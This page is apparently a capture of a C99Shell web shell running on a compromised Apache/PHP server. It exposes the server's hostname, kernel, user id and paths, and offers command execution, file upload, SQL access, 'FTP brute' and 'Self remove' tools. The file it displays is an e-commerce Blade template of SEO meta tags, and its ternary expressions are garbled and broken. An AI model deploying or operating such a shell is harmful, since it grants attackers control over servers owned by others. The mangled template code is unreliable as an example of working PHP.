!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/storage/framework/views/   drwxr-xr-x
Free 27.37 GB of 117.98 GB (23.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     fef959aec6f3b14efff2ab18ea0ecbd0a3a2d31c.php (2.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    $seoTitle 
= isset($seo['title']) && strlen($seo['title']) > $seo['title'] : $name;
    
$seoDescription = isset($seo['description']) && strlen($seo['description']) > $seo['description'] : $summary;
    
$seoImage '';
    if (isset(
$seo['image']) && strlen($seo['image']) && !is_array($seo['image'])) {
        
$seoImage $seo['image'];
    } else if (
is_array($images) && count($images)) {
       
$seoImage reset($images);
    }
?>
<meta name="robots" content="index, follow">
<meta name="description" content="<?php echo e($seoDescription); ?>" />
<meta name="keywords" content="">
<!-- Schema.org markup for Google+ -->
<meta itemprop="name" content="<?php echo e($seoTitle); ?>">
<meta itemprop="description" content="<?php echo e($seoDescription); ?>">
<meta itemprop="image" content="<?php echo e($seoImage); ?>">

<!-- Twitter Card data -->
<meta name="twitter:card" content="<?php echo e(__('Product')); ?>">
<meta name="twitter:site" content="@publisher_handle">
<meta name="twitter:title" content="<?php echo e($seoTitle); ?>">
<meta name="twitter:description" content="<?php echo e($seoDescription); ?>">
<meta name="twitter:creator" content="@author_handle">
<meta name="twitter:image" content="<?php echo e($seoImage); ?>">
<meta name="twitter:data1" content="">
<meta name="twitter:label1" content="<?php echo e(__('Price')); ?>">

<!-- Open Graph data -->
<meta property="og:title" content="<?php echo e($seoTitle); ?>" />
<meta property="og:type" content="og:<?php echo e(__('Product')); ?>" />
<meta property="og:url" content="<?php echo e(route('site.productDetails', ['slug' => $slug])); ?>" />
<meta property="og:image" content="<?php echo e($seoImage); ?>" />
<meta property="og:description" content="<?php echo e($seoDescription); ?>" />
<meta property="og:site_name" content="<?php echo e(trimWords(preference('company_name'), 17)); ?>" />
<meta property="og:price:amount" content="" />
<meta property="product:price:currency" content="<?php echo e(currency()->name); ?>" />
<meta property="fb:app_id" content="">
<?php /**PATH /home/picotech/domains/ecom1.picotech.app/public_html/resources/views/site/layouts/section/product-details/seo.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--